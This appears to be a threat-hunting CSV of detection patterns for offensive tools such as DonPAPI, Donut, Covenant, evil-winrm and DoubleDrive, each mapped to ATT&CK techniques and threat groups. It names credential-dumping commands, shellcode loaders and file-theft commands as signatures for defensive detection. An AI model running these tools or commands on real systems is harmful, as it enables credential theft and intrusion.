"*donpapi -credz *",".{0,1000}donpapi\s\-credz\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41408"
"*donpapi.lazagne.softwares*",".{0,1000}donpapi\.lazagne\.softwares.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41409"
"*donpapi.myseatbelt'*",".{0,1000}donpapi\.myseatbelt\'.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41410"
"*DonPAPI.py *",".{0,1000}DonPAPI\.py\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41411"
"*donpapi_dump*",".{0,1000}donpapi_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41412"
"*donpapi-master.zip*",".{0,1000}donpapi\-master\.zip.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41413"
"*Don't be evil with this. I created this tool to learn*",".{0,1000}Don\'t\sbe\sevil\swith\sthis\.\sI\screated\sthis\stool\sto\slearn.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","41414"
"*Don't go to the police or the FBI for help. They won't help you*",".{0,1000}Don\'t\sgo\sto\sthe\spolice\sor\sthe\sFBI\sfor\shelp\.\sThey\swon\'t\shelp\syou.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","41415"
"*DON'T RUN THIS IN YOUR WEB ROOT AS IT WILL OUTPUT ACCESS TOKENS*",".{0,1000}DON\'T\sRUN\sTHIS\sIN\sYOUR\sWEB\sROOT\sAS\sIT\sWILL\sOUTPUT\sACCESS\sTOKENS.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","41416"
"*Don't use your cat's name as a password!*",".{0,1000}Don\'t\suse\syour\scat\'s\sname\sas\sa\spassword!.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","41417"
"*Don't_blindly_trust_obfuscated_code_it_might_do_something_bad*",".{0,1000}Don\'t_blindly_trust_obfuscated_code_it_might_do_something_bad.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","41418"
"*donut -f *.dll -c * -m RunProcess*",".{0,1000}donut\s\-f\s.{0,1000}\.dll\s\-c\s.{0,1000}\s\-m\sRunProcess.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","41419"
"*donut -f c2.dll*",".{0,1000}donut\s\-f\sc2\.dll.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","41420"
"*donut* \DemoCreateProcess.dll *",".{0,1000}donut.{0,1000}\s\\DemoCreateProcess\.dll\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41421"
"*donut.exe *.exe*",".{0,1000}donut\.exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41422"
"*DONUT_BYPASS_CONTINUE*",".{0,1000}DONUT_BYPASS_CONTINUE.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41423"
"*donut-loader -*",".{0,1000}donut\-loader\s\-.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41424"
"*Donut-Loader -process_id*",".{0,1000}Donut\-Loader\s\-process_id.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41425"
"*DonutLoader(*",".{0,1000}DonutLoader\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41426"
"*DonutLoader.cs*",".{0,1000}DonutLoader\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","41427"
"*donut-maker.py -*",".{0,1000}donut\-maker\.py\s\-.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41428"
"*donut-maker.py -i *.exe*",".{0,1000}donut\-maker\.py\s\-i\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41429"
"*donut-payload.*",".{0,1000}donut\-payload\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41430"
"*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41431"
"*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41432"
"*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","41433"
"*doredry/TokenFinder*",".{0,1000}doredry\/TokenFinder.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","1","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","41434"
"*dos-over-tor*",".{0,1000}dos\-over\-tor.{0,1000}","offensive_tool_keyword","dos-over-tor","Proof of concept denial of service over TOR stress test tool. Is multi-threaded and supports multiple attack vectors.","T1583 - T1090","TA0040 - TA0043","N/A","N/A","DDOS","https://github.com/skizap/dos-over-tor","1","0","N/A","N/A","N/A","1","41","13","2018-07-21T01:44:41Z","2018-07-26T07:05:37Z","41436"
"*dothatlsassthing*",".{0,1000}dothatlsassthing.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","41437"
"*dotnet ./Server.dll*",".{0,1000}dotnet\s\.\/Server\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","#linux","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","41438"
"*dotnet inline-execute *",".{0,1000}dotnet\sinline\-execute\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","41439"
"*dotnet Inveigh.dll*",".{0,1000}dotnet\sInveigh\.dll.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","41440"
"*dotnet ParseMalleable/ParseMalleable.dll*",".{0,1000}dotnet\sParseMalleable\/ParseMalleable\.dll.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","41441"
"*dotnet_serve_payload*",".{0,1000}dotnet_serve_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","41442"
"*DotNet2JSImplant*",".{0,1000}DotNet2JSImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","41443"
"*DotNetArtifactGenerator.py*",".{0,1000}DotNetArtifactGenerator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","41444"
"*DoubleAgent.sln*",".{0,1000}DoubleAgent\.sln.{0,1000}","offensive_tool_keyword","DoubleAgent","DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. the attackers DLL would still be injected every time the process executes.","T1055 - T1059 - T1053","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Cybellum/DoubleAgent","1","1","N/A","N/A","N/A","10","1228","414","2022-08-24T10:32:36Z","2017-03-12T17:05:57Z","41445"
"*doubledrive.cloud_drive.google_drive.google_drive*",".{0,1000}doubledrive\.cloud_drive\.google_drive\.google_drive.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","41446"
"*doubledrive.cloud_ransomware*",".{0,1000}doubledrive\.cloud_ransomware.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","41447"
"*doubledrive.endpoint_takeover_utils*",".{0,1000}doubledrive\.endpoint_takeover_utils.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","41448"
"*DoUCMe-main\*",".{0,1000}DoUCMe\-main\\.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","41449"
"*douknowwhoami?d*",".{0,1000}douknowwhoami\?d.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","41450"
"*download *bloodhound*",".{0,1000}download\s.{0,1000}bloodhound.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41451"
"*download *Roaming\mRemoteNG\confCons.xml*",".{0,1000}download\s.{0,1000}Roaming\\mRemoteNG\\confCons\.xml.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41452"
"*download /etc/passwd*",".{0,1000}download\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#linux","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","41453"
"*download keylog.exe*",".{0,1000}download\skeylog\.exe.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","41454"
"*download.nus.edu.sg/mirror/blackarch/*/os/*",".{0,1000}download\.nus\.edu\.sg\/mirror\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","41459"
"*download.weakpass.com/*",".{0,1000}download\.weakpass\.com\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","41464"
